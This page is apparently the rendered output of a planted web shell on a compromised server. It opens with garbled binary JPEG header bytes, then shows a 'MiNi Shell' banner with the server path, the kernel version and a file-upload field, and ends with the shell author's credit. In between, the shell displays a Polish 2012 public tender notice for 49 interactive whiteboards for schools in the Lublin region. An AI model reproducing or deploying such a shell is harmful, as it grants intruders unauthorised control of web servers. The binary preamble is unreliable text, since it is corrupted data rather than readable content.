JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120126/23079-N-2012.html

<p class="kh_header"><b>Lublin: Zakup, dostawa i montaż 49 tablic interaktywnych.</b><br>
<b>Numer ogłoszenia: 23079 - 2012; data zamieszczenia: 26.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lubelskie Samorządowe Centrum Doskonalenia Nauczycieli , ul. Dominikańska 5, 20-111 Lublin, woj. lubelskie, tel. 081 5321605, faks 081 5344634.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zagrajmyosukceslubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup, dostawa i montaż 49 tablic interaktywnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Postanowienia ogólne:
Na przedmiot zamówienia składa się zakup, dostawa i montaż 49 tablic interaktywnych zgodnie z ppkt 2.1., 2.2. i 2.3. SIWZ.
2.		Postanowienia szczegółowe: 
2.1.	Zakup
Przedmiotem zamówienia jest zestaw składający się z tablicy interaktywnej wraz z oprogramowaniem oraz podstawą jezdną przeznaczoną dla oferowanej tablicy dla 49 szkół gimnazjalnych w województwie lubelskim, która spełnia warunki konieczne określone ppkt 2.1.1., 2.1.2., 2.1.3., 2.1.4.
2.1.1.	Parametry techniczne tablicy:
1.	Wymiary powierzchni czynnej tablicy - co najmniej 156 cm na 116 cm. 
2.	Format tablicy (proporcje boków) 4:3.
3.	Część dotykowa tablicy musi stanowić integralną część systemu. Wyklucza się różnego rodzaju przystawki i urządzenia typu (tablica wirtualna).
4.	Cała powierzchnia tablicy musi być odporna na uszkodzenia i przystosowana do wyświetlania na niej obrazu z projektora oraz pisania po niej pisakami suchościeralnymi.
5.	Musi być możliwa praca na tablicy przy pomocy palca, bez konieczności stosowania elementów aktywnych (elektronicznych, elektromagnetycznych, optycznych i innych). Tablica musi być wyposażona w nieaktywne urządzenia wskazujące (pisak lub pisaki nieaktywne) oraz  półkę lub uchwyt do ich przechowywania.
6.	Komunikacja pomiędzy komputerem a tablicą oraz zasilanie tablicy musi odbywać się przy pomocy portu USB i przewodu USB (tablica nie wymaga oddzielnego zasilacza).
7.	Konstrukcja tablicy musi umożliwiać jej montaż na ścianie lub na bezpiecznym stojaku (wózku) jezdnym zalecanym przez producenta.
8.	Tablica musi posiadać certyfikat CE i być wyprodukowana zgodnie z dyrektywą RoHS.
9.	Tablica wraz z oprogramowaniem narzędziowym (sterownikiem, klawiatura wirtualna i innym) pozwala na sterowanie komputerem i funkcjonalnie odpowiada sterowaniu przy pomocy myszy 
i klawiatury.
10.	W ofercie producenta tablicy znajduje się produkty dodatkowe poszerzające funkcjonalność tablicy tj.: system do automatycznych odpowiedzi (nazwy angielskie Audience Response System, Personal Response System, Student Response System i podobne) z pilotami bezprzewodowymi oraz tablety bezprzewodowe obsługiwane przez oprogramowanie tablicy.
2.1.2.	Parametry techniczne podstawy (stojaka, wózka) jezdnej:
1.	Model podstawy jezdnej musi być modelem zalecanym lub produkowanym przez producenta tablicy.
2.	Podstawa jezdna musi mieć możliwość regulowania wysokości umieszczenia tablicy w stosunku do podłogi bez konieczności demontażu podstawy lub samej tablicy. Regulacja wysokości musi być co najmniej sześciostopniowa.
3.	Podstawa musi być wyposażona w co najmniej cztery kółka jezdne o średnicy 10 cm lub więcej. Każde kółko musi być wyposażone w blokadę.
2.1.3.	Dokumentacja, oprogramowanie oraz zasoby dostarczane wraz z tablicą
1.	Wraz z tablica musi być dostarczona instrukcja (podręcznik) użytkowania tablicy w języku polskim
2.	Wraz z tablicą musi być dostarczona instrukcja metodyczna przeznaczona dla nauczycieli wszystkich przedmiotów, napisana w języku polskim, która opisuje możliwości i podaje przykłady wykorzystania urządzenia na zajęciach w szkole.
3.	Wraz z tablica musi być dostarczone oprogramowanie narzędziowe (sterowniki, klawiatura wirtualna i inne programy narzędziowe) oraz użytkowe (tj. program pozwalający na tworzenie prezentacji - lekcji interaktywnych) w języku polskim, pochodzące w całości od producenta tablicy i przeznaczone dla systemu operacyjnego MS Windows (XP, Vista, 7) i MAC OS.
4.	Oprogramowanie użytkowe (program do tworzenia prezentacji - lekcji interaktywnych) musi mieć:
-	narzędzia rysunkowe do tworzenia obiektów graficznych typu pióro i lub pędzel, narzędzia 
do rysowania linii prostych, kształtów, oraz narzędzia do edycji (zmiany właściwości, położenia, rozmiaru) różnych obiektów,
-	narzędzia do tworzenia i edycji obiektów tekstowych przy pomocy klawiatury konwencjonalnej 
lub klawiatury wirtualnej wyświetlanej na tablicy,
-	lokalną bazę obiektów (galerie) obejmującą obiekty multimedialne (graficzne, video, typu flash, animacje i inne) pogrupowane tematycznie, z możliwością ich wyszukiwania i możliwością dodawania do bazy obiektów utworzonych przez użytkownika, 
-	możliwość wstawiania do dokumentu obiektów własnych użytkownika (spoza lokalnej bazy obiektów),
-	mechanizm porządkowania (sortowania) utworzonych stron slajdów prezentacji przy pomocy techniki (przeciągnij i upuść),
-	możliwość grupowania i rozgrupowania obiektów,
-	możliwość blokowania obiektów: całkowitego (zakaz edycji i zakaz przemieszczania) i częściowego (zakaz edycji),
-	możliwość utworzenia dla każdego obiektu łącza do innego obiektu (pliku) lokalnego lub do strony WWW,
-	możliwość zapisywania działań wykonywanych na tablicy w postaci pliku video z dźwiękiem pochodzącym z mikrofonu,
-	możliwość zapisywania dokumentu utworzonego przy pomocy tablicy (prezentacji składającej się ze slajdów) w formacie własnym tablicy oraz zapisywania (eksportowania) w formatach: strony WWW (html), prezentacji MS Power Paint, plików graficznych (jpg, png), dokumentu pdf oraz dokumentów w formacie Whiteboard Common File Format (CFF).
-	pomoc w języku polskim dostępną z poziomu oprogramowania użytkowego.
5.	Oprogramowanie użytkowe dostarczone wraz z tablicą (tj. program pozwalający na tworzenie prezentacji - lekcji interaktywnych) musi posiadać licencje, która pozwala na instalowanie tego oprogramowania na dowolnej liczbie komputerów w szkole oraz na prywatnych komputerach nauczycieli i uczniów bez ograniczeń ilościowych i czasowych. Licencja na oprogramowanie musi umożliwiać pobieranie aktualizacji i nowych wersji programu bezpłatnie i w sposób nieograniczony czasem.
6.	Producent tablicy musi zapewnić bezpłatny dostęp do zasobów w liczbie min. 100 gotowych lekcji - prezentacji w języku polskim umieszczonych na portalu społecznościowym udostępnianym przez producenta
2.1.4.	Warunki gwarancji i serwisu oraz dostawy
1.	Oferowana tablica musi posiadać gwarancję producenta na co najmniej 60 miesięcy.
2.	Dostawca zapewni znajdującą się w Polsce obsługę serwisową gwarancyjną i pogwarancyjną realizowaną  przez serwis autoryzowany przez producenta tablicy i certyfikowany zgodnie z normą ISO 9001:2000 lub ISO 9001:2008 w zakresie urządzeń audiowizualnych.
3.	Dostawca dostarczy przedmiot zamówienia tj. tablicę wraz z oprogramowaniem i podstawą jezdną do 49 szkół województwa lubelskiego wg dołączonego do SIWZ wykazu określonego w ppkt 2.2..
4.	Dostawca zamontuje tablicę na podstawie jezdnej w pomieszczeniu na terenie szkoły wskazanym przez odbiorcę (szkołę).
2.2.	Dostawa wyżej wymienionego przedmiotu zamówienia zgodnie z niżej wymienionymi odbiorcami
1.	Publiczne Gimnazjum w Trzydniku Dużym, 23-230 Trzydnik Duży 
2.	Gimnazjum im. Jana Pawła II w Zespole Szkół w Księżpolu, 23-415 Księżpol
3.	Gimnazjum im. Jana Pawła II w Miączynie, 22-455 Miączyn
4.	Gimnazjum w Wierzbicy ul. Pogodna 8, 22-150 Wierzbica
5.	Gminne Gimnazjum w Lisznie, 22-171 Kanie
6.	Gimnazjum w Rudzie-Hucie, 22-110 Ruda Huta
7.	Gminne Gimnazjum w Moniatyczach, 22-500 Hrubieszów
8.	Gimnazjum im. Polskich Noblistów ul. Jana Pawła II 17, 22-550 Werbkowice
9.	Gminne Gimnazjum im. Bolesława Chrobrego w Kozodawach, 22-500 Hrubieszów, Kozodawy 83
10.	Publiczne Gimnazjum im. Jana Pawła II w Trzeszczanach, Trzeszczany 199, 22-554 Trzeszczany
11.	Gimnazjum im. Jana III Sobieskiego w Żółkiewce, 22-335 Żółkiewka
12.	Gimnazjum Publiczne w Siennicy Różanej, 22-304 Siennica Różana
13.	Publiczne Gimnazjum im. Św. Jadwigi Królowej w Annopolu, ul. Kościuszki 8, 23-235 Annopol 
14.	Publiczne Gimnazjum w Wólce Gościeradowskiej, 23-275 Gościeradów
15.	Publicznym Gimnazjum nr 1 im. Szarych Szeregów w Kraśniku ul. Ks. J. Popiełuszki 1, 23-204 Kraśnik
16.	Gimnazjum w Uścimowie, 21-109 Uścimów
17.	Gimnazjum nr 2 im. H. Sienkiewicza ul. Lubelska 68, 21-100 Lubartów 
18.	Gimnazjum w Ostrówku, 21-102 Ostrówek
19.	Gimnazjum w Borzechowie, Borzechów Kolonia 227, 24-224 Borzechów
20.	Publiczne Gimnazjum im. Bolesława Prusa w Przybysławicach, 21-080 Garbów
21.	Publiczne Gimnazjum im. Jana Pawła II w Garbowie, 21-080 Garbów
22.	Publiczne Gimnazjum w Jabłonnie, 23-114 Jabłonna
23.	Gimnazjum nr 1 im. Obrońców Ojczyzny w Bychawie ul. Szkolna 8, 23-100 Bychawa
24.	Gimnazjum nr 1 w Bełżycach ul. Wilczyńskiego 62, 24-200 Bełżyce
25.	Gimnazjum w Wysokiem, 23-145 Wysokie
26.	Gimnazjum nr 2 w Bełżycach ul. Kościuszki 148, 24-200 Bełżyce
27.	Gimnazjum w Wojciechowie, 24-204 Wojciechów
28.	Gimnazjum nr 2, 21-003 Ciecierzyn 121 
29.	Gimnazjum w Milejowie, ul. Szkolna 1, 21-020 Milejów 
30.	Gimnazjum im. Jana Pawła II ul. Mickiewicza 19, 21-013 Puchaczów
31.	Publiczne Gimnazjum w Cycowie, 21-070 Cyców
32.	Gimnazjum nr 3 w Okrzei, 21-470 Krzywda
33.	Gimnazjum nr 1 w Hucie Dąbrowie ul. Hutnicza 30, 21-470 Krzywda
34.	Gimnazjum nr 2 w Radoryżu Kościelnym, 21-470 Krzywda
35.	Gimnazjum im. Jana Pawła II w Poniatowej ul. Szkolna 8, 24-320 Poniatowa
36.	Gimnazjum im. Jana Kochanowskiego w Łaziskach, 24-335 Łaziska
37.	Gimnazjum im. Józefa Ignacego Kraszewskiego w Milanowie, ul. Szkolna 12, 21-210 Milanów 
38.	Gimnazjum nr 1 w Opolu Lubelskim, ul. Szkolna 5, 24-300 Opole Lubelskie
39.	Gimnazjum w Zespole Szkół w Wyrykach, 22-205 Wyryki
40.	Gimnazjum w Siemieniu, ul. Kościelna 1, 21-220 Siemień
41.	Gimnazjum w Borkach ul. II Armii Wojska Polskiego 25, 21-345 Borki
42.	Gimnazjum nr 2 im. Lotników Polskich ul. Wojska Polskiego 27, 21-040 Świdnik
43.	Gimnazjum w Krasnobrodzie ul. Lelewela 37, 22-440 Krasnobród
44.	Publiczne Gimnazjum im. Dzieci Zamojszczyzny ul. Zamojska 8, 22-420 Skierbieszów
45.	Publiczne Gimnazjum w Komarowie-Osadzie, ul. Kościuszki 2, 22-435 Komarówka Osada
46.	Gimnazjum im. Dzieci Zamojszczyzny w Bodaczowie 501, 22-452 Bodaczów
47.	Gimnazjum Publicznym im. Róży Zamoyskiej w Zwierzyńcu ul. Armii Krajowej 36, 22-470 Zwierzyniec
48.	Gimnazjum im. Polskich Olimpijczyków w Szczebrzeszynie ul. Ogrodowa 16, 22-460 Szczebrzeszyn
49.	Publiczne Gimnazjum Nr 1 im. Unitów Drelowskich w Drelowie, ul. Szkolna 11, 21-570 Drelów
2.3.	Montaż tablicy na podstawie jezdnej na terenie wyżej wymienionych szkół zgodnie ze wskazaniem odbiorcy (szkoły).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.25.43.10-0, 60.00.00.00-8, 51.00.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.02.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.2.	posiadania wiedzy i doświadczenia, tj. zrealizowali w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej 2 dostawy z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączą dokumenty potwierdzające, że dostawy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.4.	sytuacji ekonomicznej i finansowej, tj. opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">6.1.	instrukcję (podręcznik) użytkowania tablicy w języku polskim, 
6.2.	instrukcję metodyczną przeznaczoną dla nauczycieli wszystkich przedmiotów, napisaną w języku polskim.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ebip.lublin.pl/31/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> LSCDN
ul. Dominikańska 5, 
20-111 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2012 godzina 10:00, miejsce: LSCDN
ul. Dominikańska 5, 
20-111 Lublin
pokój nr 12 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest zakup, dostawa i montaż 49 sztuk tablic interaktywnych w ramach projektu systemowego pn. Wyrównywanie szans edukacyjnych uczniów poprzez dodatkowe zajęcia rozwijające kompetencje kluczowe - Zagrajmy o sukces, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grupy o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych ze środków Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com